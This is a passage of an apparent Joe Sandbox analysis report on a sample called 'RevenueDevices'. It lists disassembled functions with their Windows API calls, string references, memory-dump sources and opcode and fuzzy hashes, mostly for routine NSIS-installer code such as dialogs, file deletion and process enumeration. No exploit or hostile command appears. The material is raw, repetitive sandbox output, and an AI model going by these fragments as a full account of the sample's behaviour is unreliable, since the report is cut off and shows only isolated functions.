                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                          Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                          Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                          Non-executed Functions

                                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          • API String ID: 565278875-1653569448
                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
